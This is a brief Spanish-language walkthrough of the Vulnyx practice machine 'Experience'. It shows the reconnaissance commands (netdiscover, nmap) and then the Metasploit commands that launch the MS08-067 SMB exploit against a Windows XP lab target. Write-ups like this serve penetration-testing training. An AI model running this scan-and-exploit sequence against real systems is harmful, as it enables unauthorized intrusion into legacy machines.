Máquina Experience (Vulnyx)
Comenzamos con averiguar la dirección IP de la Máquina Víctima, para ello utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Víctima: 10.0.2.8
$ ping -c 1 10.0.2.8
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn 10.0.2.8 -sVC
Como podemos comprobar la Máquina Víctima tiene abiertos los puertos 135, 139 y 445; y nos confirma que se trata de una Máquina con Windows XP.
A continuación, comprobamos si el servicio que corre por el puerto 445 (smb) es vulnerable su versión, para ello usaremos el script vuln de nmap, para ello ejecutaremos el siguiente comando:
$ nmap -p 445 10.0.2.8 --script vuln
Y comprobamos que es vulnerable.
A continuación, haremos uso de la herramienta Metasploit, para ello ejecutamos el siguiente comando para arrancarla:
$ msfconsole
Buscamos este exploit, para ello ejecutamos el siguiente comando dentro de la consola de Metasploit:
msf6> search ms08-067
Seleccionamos, configuramos y lanzamos el exploit, para ello ejecutamos los siguientes comandos dentro de la consola de Metasploit:
msf6> use 0
msf6> set RHOSTS 10.0.2.8
msf6> run




